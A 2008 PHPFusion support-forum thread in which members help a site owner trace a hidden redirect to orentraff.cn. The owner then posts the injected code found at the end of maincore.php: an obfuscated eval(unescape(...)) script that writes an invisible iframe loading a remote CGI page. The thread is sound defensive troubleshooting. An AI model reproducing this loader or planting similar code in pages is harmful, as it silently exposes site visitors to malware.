orentraff.cn hacker?: PHPFusion 6 Support

Home
Search

Oh no! Where's the JavaScript?
Your Web browser does not have JavaScript enabled or does not support JavaScript. Please enable JavaScript on your Web browser to properly view this Web site, or upgrade to a Web browser that does support JavaScript.

Hi people..

When i navigate trough my sites i see a unknown address appearing for a fraction of a second,it mostly appears when i use the back & forward buttons in my browserwindow.

www.uwkabaal.com/images/orentraff.gif

I used Google to know more about that orentraff.cn domain and it seems it is a domains that's hosted in China and that it is some kind of hacker.
But no idea what this hack (if it is a hack) does.
I can't find any damage or alterations that was done to my sites.
Anyone else that experienced this problem?

This is what i found using Google:

"orentraff.cn is a domain name. The code was calling something from
another server into an invisible iframe. That something is probably
malicious."

Edited by Puma on 29-05-2008 03:25, 16 y

0 replies

I have checked those files but nothing to find..

Wow.. i guess that's like looking for a needle in a haystack lol B)

Why does a site always give does problems that are driving me insane :D
I'm going madd i tell you.. maaad.. maaad.. maaaaaaaaaaaaad!!! lol

Well i guess i have to look for that code in every index.php file in every folder.
I will let you know if i found it,in about 3weeks or something :D

Edited by Puma on 29-05-2008 05:33, 16 y

0 replies

It maybe code that was injected in the database. Make a backup of your database in sql format. Open it in a text editor and search for the orentraff.cn string.
If you want to make certain it is not in one of the files, you can use a program like AgentRansack to search the code in all files of your folder (copy on local server) to search for the orentraff string, or maybe even for files calling an iframe.

0 replies

It can also be that the hacker have placed some code in one of your sidepanels. This will also be discovered if you do like Paul says above. It can also happen that the hackers place their code in one of the .php files on your site (more hazzle to find then), but then they need to use FTP.

0 replies

A quick google search reveals you're not alone. This seems to be a serious threat...
http://www.murga-linux.com/puppy/view...mp;t=26767

There are plenty of queries like yours but few fixes. Several threads mentions tranfer of registration details, etc.

You should probably disable your site until solved.

p.s. I don't know if it's a coincedence or not but when I opened this thread, I got a virus warning from my AVG...

Virus identified JS/Downloader Agent
Detected on open

Sorry, I couldn't be more help :(

Edited by HobbyMan on 29-05-2008 11:44, 16 y

0 replies

Probably checked already, but do you have any other files in your root folder that is not PHPFusion related?
Also have a peek at any eventual .htaccess file.

I would delete all files in the root (not subfolders) folder and upload new ones from a fresh release.

Puma what is that link in your signature, the last
uwkabaal.com/sig.png

??

Edited by Homdax on 29-05-2008 11:50, 16 y

0 replies

Homdax: i didn't find any files that are not php-fusion related but i will take a closer look at it.
The missing image you see in my signature is the dynamic_signature that shows an image with some live site information,but for some reason it stopped working after i did an upgrade to the most recent version of fusion.
(But i see now that an admin must have removed it by now hehe..)

Quote

I would delete all files in the root (not subfolders) folder and upload new ones from a fresh release.

I'm affraid that's not realy an option because most files are modded for some infusion or mod.

Muscapaul: yup with the info i found on the net i also saw that it could be some code that was injected in the db,i will make a sql backup this evening when i come home from work and make a search with notepad+ ;)
And thanks for the tip regarding that AgentRansack program,it will be much easyer to find it like that then make a search in every file manualy.

I'm not quite sure what that trojan does since i don't see any changes to my sites,or how it managed to get in to one of the files.
But one thing i'm sure of is that it has nothing to do with a possible php-fusion leak because it can be found on several sites that are not running fusion.

I'll have a closer look this evening when i get home ;)

Edited by Puma on 29-05-2008 16:46, 16 y

0 replies

Quote

I'm affraid that's not realy an option because most files are modded for some infusion or mod.

Tough, but you will OBVIOUSLY have them all properly documented, the code changes, and can hence start fresh.
Honestly Puma, don't get me wrong, if it turns out the hack is among those files and you don't know how the modded code should look like, and have no documentation of it, I really don't feel very sorry for you.

Document. Backup. Implement. Backup. Run. ...for your life. ;)

0 replies

Falk

answered 29 May 2008 at 06:36 PM

Super Admin

Its not that much code, just a simple iframed redirect so no need to over do it.

Naturaly if its not in the files and all files have been checked the next step would be the DB ;)

0 replies

Yes, check all files and your database.
And change your passwords, if they have access to your database, they can to want they want with your site...

I wrote a little guide, about what todo when you got hacked:
http://www.php-fusion.co.uk/forum/vie...ost_115733

0 replies

A made a sql backup and searched the sql file with notepad++ for words like 'orentraff', '.cn/default/cgi' etc. but the file was clean.

I also made a complete ftp backup from one of the "infected" domains and searched it with the AgentRansack program that Muscapaul suggested (which is a very good tool to search multiple files/folders) but that ftp backup was also clean.

Could it be that the injected code was written in chinese so that it can't be detected by a program that is designed to work with western chars?

In my ftp there are multiple domain folders so is it possible that the code was placed in another domainfolder and that all domains get infected this way?

@Homedax: Yes i always keep the mods/infusions i use in a folder on my pc,with all readme files included ofcourse..
But that folder was on my other pc and unfortunately that HD crashed last week so i don't have all the original files anymore or all readme's. ;)
I think it's a little pointless to remod my whole site just to find some code imo hehe..

0 replies

Search the DB and files again for sig.png
Mayby there's some file called sig.png that contains some malicous code which tries to connect to the orentraff website to start some CGI script.
Also search you entire PC, including system files/folders and hidden files/folders for sig.png.

Edited by Xessive on 30-05-2008 00:50, 16 y

0 replies

Xessive: No, and what you guyes are refering too is the same thing as in my signature.

You'll find it her (you'll have to be logged in to download it).

0 replies

Yep i'm not sure why hobbyman received a virus warning from my sig thingie because it's exact the same one as Starefossen is using ;)

yeah i'll scan my pc also ;)
Maybe it's some kind of trojan on my pc that f*cks with my browser (strangely enough only with my own sites then lol)

0 replies

Btw,i think i found an answer in this forum: http://board.awempire.com/printthread...php?t=6895

It seems the hacker scrambled his code,the way like you can find online converters to make html sourcecode unreadable.
In my maincore file i found the exact same code as they talked about on that site:

Code Download source

<!-- ~ --><script type="text/javascript">
eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%5C%75%30%30%33%63%5C%75%30%30%36%39%5C%75%30%30%36%36%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%64%5C%75%30%30%36%35%5C%75%30%30%32%30%5C%75%30%30%37%33%5C%75%30%30%37%32%5C%75%30%30%36%33%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%36%38%5C%75%30%30%37%34%5C%75%30%30%37%34%5C%75%30%30%37%30%5C%75%30%30%33%61%5C%75%30%30%32%66%5C%75%30%30%32%66%5C%75%30%30%36%66%5C%75%30%30%37%32%5C%75%30%30%36%35%5C%75%30%30%36%65%5C%75%30%30%37%34%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%36%5C%75%30%30%36%36%5C%75%30%30%32%65%5C%75%30%30%36%33%5C%75%30%30%36%65%5C%75%30%30%32%66%5C%75%30%30%36%39%5C%75%30%30%36%65%5C%75%30%30%32%65%5C%75%30%30%36%33%5C%75%30%30%36%37%5C%75%30%30%36%39%5C%75%30%30%33%66%5C%75%30%30%33%35%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%30%30%37%37%5C%75%30%30%36%39%5C%75%30%30%36%34%5C%75%30%30%37%34%5C%75%30%30%36%38%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%33%30%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%30%30%36%38%5C%75%30%30%36%35%5C%75%30%30%36%39%5C%75%30%30%36%37%5C%75%30%30%36%38%5C%75%30%30%37%34%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%33%30%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%30%30%37%33%5C%75%30%30%37%34%5C%75%30%30%37%39%5C%75%30%30%36%63%5C%75%30%30%36%35%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%36%34%5C%75%30%30%36%39%5C%75%30%30%37%33%5C%75%30%30%37%30%5C%75%30%30%36%63%5C%75%30%30%36%31%5C%75%30%30%37%39%5C%75%30%30%33%61%5C%75%30%30%36%65%5C%75%30%30%36%66%5C%75%30%30%36%65%5C%75%30%30%36%35%5C%75%30%30%32%32%5C%75%30%30%33%65%5C%75%30%30%33%63%5C%75%30%30%32%66%5C%75%30%30%36%39%5C%75%30%30%36%36%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%64%5C%75%30%30%36%35%5C%75%30%30%33%65%27%29%3B"));
</script><!-- ~ -->

This code whas at the bottom of my maincore.php file,right after the ?>
I removed it and now it seems to be ok again,i still don't understand how the hell they got into my ftp. :@

0 replies

You can do that throug PHP, so if you have access to like custom pages or so you can make it write to the maincore as it is writable!

0 replies

What can we do to prevent this injection to our sites?
Make maincore unwritable? Remove custom pages? Or something else?

0 replies

Quote

MrSimple wrote:
What can we do to prevent this injection to our sites?
Make maincore unwritable? Remove custom pages? Or something else?

run the latest en completely un-modded version of PHPFusion...
Whenever you use a infusion from 3rd party the chance is there that some code
will be unsafe and vulnarable to SQL injections...

I don't know if there's a tool of some kind which can check PHP code for
sloppy code which makes SQL injections possible.
If someone knows about such a tool please post it here..!!

0 replies

Quote

MrSimple wrote:
What can we do to prevent this injection to our sites?
Make maincore unwritable? Remove custom pages? Or something else?

In v6 a hacker only needs the password of an administrator with Custom Page access to be able to do this. In v7 it will be more difficult to do the same thing as the culprit needs to acquire two passwords: a login password of an administrator and that admin's admin password that he/she has set to perform a number of admin actions (among those work on Custom Pages). Another new security feature in v7.

0 replies

Prevent your site from getting hacked:

1. Allways run the latest and greates version of the system (PHPFusion)

2. Be carefull with infusions / mods made by 3. party.

3. Never give custom pages / panels access to admins who don't need it. Only give such access to those you trust.

4. MySQL, FTP and your admin user password must be different!

5. Change all passwords on a regular basis

6. Never use your admin user password as a user password at another site!

0 replies

For dealing with the cracker / script kiddie just send homdax on a trip to china.
(like he did with the turkish ones :P )

0 replies

Category Forum

Official Core Support - 6

Labels

None yet

Statistics

Views 0 views
Posts 26 posts
Votes 0 votes
Topic users 12 members

0 participants

Notifications

Track thread

You are not receiving notifications from this thread.

orentraff.cn hacker?

26 posts

PHPFusion

Resources

Community

Development